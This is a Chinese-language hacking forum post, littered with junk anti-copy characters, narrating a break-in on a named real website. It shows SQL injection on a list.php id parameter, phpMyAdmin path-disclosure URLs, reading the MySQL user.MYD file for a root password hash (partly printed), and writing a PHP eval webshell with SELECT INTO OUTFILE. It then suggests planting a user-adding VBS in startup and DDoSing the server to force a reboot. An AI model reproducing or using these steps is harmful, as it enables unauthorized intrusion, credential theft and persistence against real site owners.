第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏# k* S2 x( Z: y, Q0 g
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!1 I# _2 S+ a& P1 Z' M) X
4 \5 R4 F4 Y8 p% T6 d) n
9 ?0 y' i) A6 x. T: d& x! G) @8 Y) u
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
) r5 x4 Q! i2 v' O" ~$ R. ]8 ?4 V3 J1 _) S- y; U
那么想可以直接写入shell ,getshell有几个条件: h4 k; J) ]' u( u; B
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF & e6 |9 m2 I$ Z
Y q& G, G B$ y7 { J试着爆绝对路径: : F+ {' j n" Q2 H" p5 v
1./phpMyAdmin/index.php?lang[]=1
: T8 v6 E+ R4 C) q/ {2./phpMyAdmin/phpinfo.php
# a; G' d1 @. r# X3./load_file()
# g5 L: X% n: C% p4./phpmyadmin/themes/darkblue_orange/layout.inc.php
1 T5 l( x; \5 j% I' I) H- [4 B5./phpmyadmin/libraries/select_lang.lib.php 1 _) H, U* \3 G# C: j/ X5 i) ~
6./phpmyadmin/libraries/lect_lang.lib.php $ {; J' D- D% S
7./phpmyadmin/libraries/mcrypt.lib.php 9 U4 G$ U9 W( Y/ z% R& Z, w" I
8./phpmyadmin/libraries/export/xls.php
, [9 }' R8 [) k0 _6 ]
1 C4 P0 C1 s* |' `0 [3 L; ~+ h均不行...........................
! m8 [& m) E0 a; h7 e) q1 l3 @0 V/ }; Z3 q5 G
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php , Y2 s$ C H3 Z/ v
9 O! {. Q+ E; M, Z9 J
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
8 E3 u0 H y- ?+ I0 c' n
7 x$ t% m9 I+ M9 {" _默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 9 s. U, l- `3 E7 s
) i& N( X/ ^5 s# h6 a2 l# ~( u
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... $ _3 S5 O- X/ s! E! f
# I% Y6 D" M8 c* {" R想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 7 g0 a/ u5 o# o# W% @3 {& P" s
) ]1 \! b/ Q( r$ [" [# c
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 6 F$ W8 U3 x. M9 v8 A
, `8 d$ d$ R* Q0 w自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
6 I" C5 b4 Z- C% g
: J0 a5 k2 E3 M P成功读到root密码:
# O- k5 @- r, R; E" k: ?
; `7 N. i& _' U5 ?3 v17---- r(0072)
2 ]4 E5 ^% ]8 H. X5 c18---- o(006f)
% c0 @* g. D5 A# a. F) l0 E1 x9 K* x19---- o(006f)
# J E$ I; P4 V$ o20---- t(0074)
4 E+ B$ Z% s- g( s! m- G* j3 J21---- *(002a)
1 h1 A; Y, y P; x0 G22---- 8(0038) ! A) w7 A( E3 X1 G P
23---- 2(0032)
* o- g8 I6 y4 G5 s2 x# ^24---- E(0045)
7 w- l# J+ Y5 B0 Q0 W25---- 1(0031)
" k4 C( L% [# G! \26---- C(0043)
6 w9 f$ R, ?! W: @; t& {3 M! V27---- 5(0035) % {+ h$ [) d& j2 L
28---- 8(0038) % F: X! F$ G q1 r) r
29---- 2(0032)
6 e5 k1 p, i: Z M5 w' D$ \4 a& H30---- 8(0038) ! S) |( N# @1 N& u% F2 e' Z
31---- A(0041) 9 w6 _( s2 O8 G) Q6 D
32---- 9(0039) ( j2 f- J8 w' T3 _5 \9 d
33---- B(0042) : }& q7 a- G! n+ C* Q
34---- 5(0035) 6 r+ f9 e$ J# g9 y
35---- 4(0034) ]/ O: F! I `* {
36---- 8(0038) 3 [. w6 {6 A2 b$ o7 p) N" n; p
37---- 6(0036) d# J5 Q. ], E% N6 ?* T& P
38---- 4(0034) $ c, K$ M. b" J: u# E
39---- 9(0039)
( I$ |- K- W" s2 F40---- 1(0031) 2 z2 G9 z' s8 W% w
41---- 1(0031) 8 F. k( }9 w u! A# l
42---- 5(0035) ! V& A2 e8 s0 Z+ V% }9 M: a- J
43---- 3(0033)
. n# p. o8 x4 g4 H/ o& e44---- 5(0035) 0 @9 v1 {$ y3 X2 V% e( D# q* M
45---- 9(0039) - y: C( ~9 d9 d1 |
46---- 8(0038)
, j% P% \5 h1 W% n0 K6 c7 a47---- F(0046)
- \2 h; {( ?0 x) X* Y+ n48---- F(0046) ) c s9 _ y v- q4 Z) h
49---- 4(0034) 3 x5 v0 I6 I' |
50---- F(0046)
! O) p1 |" u4 n9 T51---- 0(0030) . q( m. J1 Z6 o7 i% k# i
52---- 3(0033) / Y1 D7 c* u `
53---- 2(0032)
8 X- r+ s/ p/ K# V2 |54---- A(0041)
3 r0 }) X, s: B& c" Q* r5 t55---- 4(0034) ! s3 q/ r5 x Y( b( L
56---- A(0041) . ]1 G2 K' {+ \2 v; P, W% }- ]
57---- B(0042) , L5 X$ A! H& O w" B$ L
58---- *(0044)
. V. E* ]5 f+ M/ K% s8 w3 [59---- *(0035) 1 F: r T/ W E8 t9 Q( k
60---- *(0041) % \( H: ]# C1 m8 f
61---- *0032)
( T5 w6 g& r. ]9 e0 `7 }, U6 `+ i# e+ _0 y/ Z% _2 N
解密后成功登陆phpmyamin
0 e3 u; Z5 T, J1 G5 _) d" h
! \. G8 d! n+ W; |( d" e
/ J0 F) [6 H5 q, F/ y . r& G/ _5 s* G6 K5 r/ S' c
+ E) T1 r' f( `& V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 4 P! ^( ?2 B! I, h$ t" }+ ]
$ u6 L+ f1 M( g" d* `; z# L
成功执行,拿下shell,菜刀连接: * v& p! Z8 `8 P5 l V4 t R% g( b, v% X
) ?+ b0 x3 X) o5 G
服务器不支持asp,aspx,php提权无果...................
' ~+ q7 q: w3 Z1 O
! ]- u+ `5 X+ _5 Y* J但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: - j: X- I5 o4 P9 S N- d* n
服务器上已经有个隐藏帐号了
& Y# ^& ~( n! @别名 administrators
9 s4 ~. Q; U7 b+ s注释 管理员对计算机/域有不受限制的完全访问权
1 {1 u3 u, p2 Q成员 : H O7 a/ E- c
-------------------------------------------------------------------------------
. G+ `" S7 h( q0 _+ Qadmin
8 N- Q6 U- r7 Z. k% u" _! p9 nAdministrator: i3 T7 \7 G! Q! f& F3 L" `3 V
slipper$4 k8 F, x7 p) K6 }& y0 h& [- @- @! x
sqluser
* i/ {. z* s- ?; y$ {命令成功完成。 " K) Z" d5 M. H S6 q8 F) r+ i9 e
) y: F/ n; S) F7 v; D
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
" {! F4 T5 ]9 V3 i1 [
& N- r1 e E' M2 o \2 S& e" Zddos服务器重启,不然就只能坐等服务器重启了...............................
4 `$ \2 S- f* n- a
+ M0 Z% \$ e. n9 `: x- m& l 0 @6 [5 e( ?7 U2 K5 ]3 B- h
|